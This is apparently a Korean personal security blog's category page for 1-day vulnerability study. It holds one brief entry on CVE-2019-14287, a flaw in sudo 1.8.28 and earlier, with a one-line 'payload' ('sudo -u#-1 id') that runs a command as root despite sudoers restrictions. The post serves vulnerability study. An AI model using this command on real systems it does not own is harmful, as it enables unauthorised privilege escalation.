'HACKING/1-DAY study' 카테고리의 글 목록 :: SSo

HACKING/1-DAY study

CVE-2019-14287 2019.10.19

CVE-2019-14287

2019. 10. 19. 01:50

Description

Sudo 1.8.28 이하 버전에서 발생하는 취약점으로, sudo가 임의의 사용자 ID로 명령을 실행하는 방식에서 결함이 발생함.

payload

$ sudo -u#-1 id

PREV 1 NEXT

+ Recent posts

Powered by Tistory, Designed by wallel

티스토리툴바